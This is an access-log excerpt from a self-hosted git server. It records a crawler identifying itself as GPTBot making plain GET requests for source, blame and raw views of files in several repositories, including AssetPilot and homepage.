-[17/Feb/2026:16:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:16:42:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:16:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/requirements.txt" -[17/Feb/2026:16:42:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/updateRecord.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/updateRecord.md" -[17/Feb/2026:16:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9907] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:16:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 14194] [Gzip 8.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:16:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1403] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:16:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:16:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 14224] [Gzip 8.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:16:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1403] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" -[17/Feb/2026:16:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14875] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=mostissues&state=all" [Client 74.7.227.38] [Length 8501] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=mostissues&state=open" -[17/Feb/2026:16:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:16:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:16:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll?display=rendered" [Client 74.7.227.38] [Length 10843] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libgcc_s_seh-1.dll" -[17/Feb/2026:16:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=name&state=closed" [Client 74.7.227.38] [Length 8504] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" -[17/Feb/2026:16:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11045] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11041] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/vite.config.ts" -[17/Feb/2026:16:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip?display=source" [Client 74.7.227.38] [Length 11561] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:16:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:16:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14869] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16523] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14254] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13977] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" -[17/Feb/2026:16:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14225] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" -[17/Feb/2026:16:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9976] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21635] [Gzip 28.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21681] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15599] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15599] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" -[17/Feb/2026:16:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14258] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" -[17/Feb/2026:16:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16524] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14257] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" -[17/Feb/2026:16:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13951] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" -[17/Feb/2026:16:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14866] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" -[17/Feb/2026:16:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14868] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" -[17/Feb/2026:16:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16525] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13978] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" -[17/Feb/2026:16:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" -[17/Feb/2026:16:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14255] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" -[17/Feb/2026:16:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 